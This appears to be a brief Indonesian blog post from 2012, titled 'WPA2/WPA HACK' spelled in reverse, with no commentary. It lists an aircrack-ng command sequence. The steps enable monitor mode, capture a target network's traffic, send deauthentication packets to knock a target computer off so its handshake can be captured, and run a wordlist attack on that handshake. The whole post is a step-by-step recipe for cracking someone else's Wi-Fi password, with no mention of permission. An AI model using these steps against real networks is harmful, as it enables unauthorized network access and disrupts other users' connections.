Selasa, 30 Oktober 2012

2APW/APW KCAH

airmon-ng

airmon-ng start wlan0

airmon-ng stop mon1

airodump-ng mon0

airodump-ng -c 6 -w test --bssid (mac address wireless) --ivs mon0

aireplay-ng -0 10  -a (mac address wireless) -c (mac addres computer target) mon0

aircrack-ng -w (file dark code) (file handshake bernama Test-01.ivs)

enter

Tidak ada komentar:

Posting Komentar